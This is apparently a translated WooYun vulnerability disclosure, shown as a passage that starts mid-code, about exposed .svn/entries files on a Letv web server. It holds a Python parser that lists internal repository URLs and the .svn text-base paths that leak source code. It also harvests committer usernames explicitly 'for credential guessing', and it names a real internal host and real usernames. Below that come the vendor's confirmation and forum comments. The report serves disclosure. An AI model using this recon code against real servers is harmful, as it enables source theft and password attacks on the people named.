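            url="http://svn2.letv.cn/tp/front-end-tv/tag/lepai.letv.com/pc/20150119/php/Html/Admin",
            repos="http://svn2.letv.cn", committed_date="2015-05-20T06:46:03.612937Z",
            committed_rev="79464", last_author="xielijiao",
            cachable_props="svn:special svn:externals svn:needs-lock",
            uuid="21433022-bb36-4ff6-a907-2c018ad81495"),
    _record(name="favicon.ico", kind="file", text_time="2015-05-20T06:48:22.000000Z",
            checksum="6950488799a0ff598be6fd5d0cc5f928",
            committed_date="2015-02-11T02:35:09.702296Z", committed_rev="60246",
            last_author="liliangliang", has_props="has-props", working_size="4286"),
    _record(name="index.php", kind="file", text_time="2015-05-20T06:48:22.000000Z",
            checksum="939428b2e5c56814d7470d58474a8f64",
            committed_date="2015-01-15T11:24:20.809322Z", committed_rev="54319",
            last_author="liliangliang", working_size="1109"),
    _record(name="js", kind="dir"),
    _record(name="res", kind="dir"),
    _record(name="style", kind="dir"),
])


def parse_entries(text):
    """Return (format, [entry dicts]) for a pre-1.7 entries file."""
    head, _, body = text.partition("\n")
    fmt = int(head.strip())
    if not 8 <= fmt <= 10:
        raise ValueError("format %d is not the 1.4-1.6 text layout" % fmt)
    entries = []
    for record in body.split("\f\n"):
        lines = record.split("\n")
        if not any(lines):          # empty tail after the last "\f\n"
            continue
        entries.append({f: (lines[i] if i < len(lines) else "")
                        for i, f in enumerate(FIELDS)})
    return fmt, entries


def child_urls(entries):
    """Repository URL of each child, from the directory's own (first) record."""
    base = entries[0]["url"]
    return {e["name"]: base + "/" + e["name"] for e in entries[1:]}


def pristine_paths(entries, svn_dir=".svn"):
    """Where 1.4-1.6 keeps the unmodified copy of every versioned file; if the
    web server exposes .svn/, these paths return the source (e.g. index.php)."""
    return ["%s/text-base/%s.svn-base" % (svn_dir, e["name"])
            for e in entries if e["kind"] == "file"]


def authors(entries):
    """Committer usernames, useful for credential guessing against the SVN host."""
    return sorted({e["last_author"] for e in entries if e["last_author"]})


if __name__ == "__main__":
    fmt, entries = parse_entries(SAMPLE_ENTRIES)
    print("format", fmt, "entries", [e["name"] or "." for e in entries])
    print("committers", authors(entries))
    print("pristine copies", pristine_paths(entries))
```

Beyond file names, the first record gives the internal repository host and path, the UUID, and two committer usernames; every subdirectory listed (js, res, style) has its own .svn/entries to walk in the same way.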


Fix recommendation:

While I'm at it, could I get a 乐码 (Letv phone purchase code)? Thanks :) Letv is a good vendor!

Copyright notice: when reposting, please credit the source 小老大@乌云


Response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-05-27 17:30

Vendor reply:

Many thanks for supporting Letv security, but we don't have any phone 乐码 either >_<; at 12:00 on June 2 I'll go to the Letv mall and try to grab one for you~

Latest status:

None yet


Comments:

  1. 2015-05-27 18:04 | jeary ( Regular white hat | Rank:296 Vulns:106 | (:‮.kcaH eb nac gnihtynA))

    The vendor folks are really nice.

  2. 2015-06-06 10:08 | 大漠長河 ( Intern white hat | Rank:43 Vulns:7 | ( 天龙源景区欢迎您...))

    Such a nice, conscientious vendor; the reporter was probably so excited he stuttered. Learned something.

  3. 2015-07-11 18:47 | Black Angel ( Regular white hat | Rank:163 Vulns:35 | The most amazing group of people, wise, low-key and reserved, commonly known as sock puppets...)

    Such a nice, conscientious vendor; the reporter was probably so excited he stuttered. Learned something.

  4. 2015-07-12 15:56 | 娃哈哈 ( Intern white hat | Rank:36 Vulns:6 | The great scientist)

    Such a nice, conscientious vendor; the reporter was probably so excited he stuttered. Learned something.

  5. 2015-07-14 09:06 | 小老大 ( Passerby | Rank:10 Vulns:1 | http://www.wooyun.org)

    @乐视网 conscientious vendor, two months have gone by, where's the plush toy you promised?